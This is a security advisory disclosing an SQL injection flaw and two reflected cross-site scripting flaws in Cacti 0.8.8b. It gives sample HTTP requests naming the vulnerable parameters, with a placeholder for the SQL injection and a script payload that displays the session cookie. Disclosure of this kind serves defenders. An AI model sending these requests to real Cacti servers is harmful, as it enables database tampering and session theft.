Trustwave SpiderLabs Security Advisory TWSL2016-007:
Multiple Vulnerabilities in Cacti

Published: 04/20/2016
Version: 1.0

Vendor: The Cacti Group, Inc (http://www.cacti.net)
Product: Cacti
Version affected: 0.8.8b 

Product description:
Cacti is a complete frontend to RRDTool, it stores all of the necessary 
information to create graphs and populate them with data in a MySQL database. 
The frontend is completely PHP driven. Along with being able to maintain 
Graphs, Data Sources, and Round Robin Archives in a database, cacti handles the 
data gathering. There is also SNMP support for those used to creating traffic 
graphs with MRTG.

Discovered vulnerabilities were confirmed on the Ubuntu 64-bit 14.04.1

Finding 1: SQL Injection
Credit: Piotr Karolak of Trustwave SpiderLabs
CWE: CWE-89

graph_template_input_id and graph_template_id parameters in the authenticated 
portion of Cacti do not properly sanitize input.  As any user (Administrator or 
unprivileged), SQL statement can be injected into the application in the location 
shown in the sample Request. This vulnerability can be exploited in an automated manner, 
using some sql injection exploitation tool like SQLMAP.

#Request

POST /cacti/graph_templates_inputs.php HTTP/1.1
Content-Length: 286
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://a.b.c.d:80/cacti/index.php
Cookie: Cacti=k1e5gud5e6b7fnaai3stclrql7
Host: a.b.c.d
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

action=save&any_selected_item=&column_name=task_item_id&description=1&graph_template_id=10&graph_template_input_id=[SQL injection here]&name=oxxqftus&save_component_input=1

Finding 2: Cross-Site Scripting Vulnerability
*****Credit: Piotr Karolak of Trustwave SpiderLabs
CWE: CWE-79


1. The 'parent_id' parameter in Cacti is vulnerable to a cross-site scripting 
vulnerability when Javascript is supplied via GET request. The exploitation example 
below uses the "alert()" JavaScript function to display the session cookie.

#Request:

GET /cacti/tree.php?action=item_edit&parent_id=0'><script%20>alert(document.cookie)</script> HTTP/1.1
Referer: http://a.b.c.d:80/cacti/
Cookie: Cacti=qo7abeurhugh804a6l20f1ps90
Host: a.b.c.d
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

2. The 'drp_action' parameter in Cacti is vulnerable to a cross-site scripting 
vulnerability when Javascript is supplied via POST request. The exploitation example 
below uses the "alert()" JavaScript function to display the session cookie. This can 
allow the attacker to access any cookies retained by the browser.

#Request:

POST /cacti/data_sources.php HTTP/1.1
Content-Length: 130
Content-Type: application/x-www-form-urlencoded
Referer: http://a.b.c.d:80/cacti/
Cookie: Cacti=qo7abeurhugh804a6l20f1ps90
Host: a.b.c.d
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

action=actions&all=on&chk_3=on&chk_4=on&chk_5=on&chk_6=on&chk_7=on&drp_action=1'><script%20>alert(document.cookie)</script>


Remediation Steps:
No official fix is available.  However, these vulnerabilites can be mitigated 
with the use of a Web Application Firewalls (WAF).  Trustwave's WAF and 
ModSecurity solutions can provide out-of-the-box protections against these 
threats.

Revision History:
04/07/2015 - Attempt to contact vendor
05/06/2015 - Attempt to contact vendor
05/21/2015 - Attempt to contact vendor
12/28/2015 - Attempt to contact vendor adding cacti-user@sourceforge.net email address
04/11/2016 - Final Attempt to contact vendor
04/20/2016 - Advisory published


References
1. https://www.owasp.org/index.php/SQL_Injection
2. https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)#Reflected_XSS_Attacks
3. http://docs.cacti.net/ - Official Cacti Documentation Site
4. http://www.cacti.net/bugs.php - Bug Reporting


About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security 
risk. With cloud and managed security services, integrated technologies and a 
team of security experts, ethical hackers and researchers, Trustwave enables 
businesses to transform the way they manage their information security and 
compliance programs. More than three million businesses are enrolled in the 
Trustwave TrustKeeper cloud platform, through which Trustwave delivers 
automated, efficient and cost-effective threat, vulnerability and compliance 
management. Trustwave is headquartered in Chicago, with customers in 96 
countries. For more information about Trustwave, visit 
https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.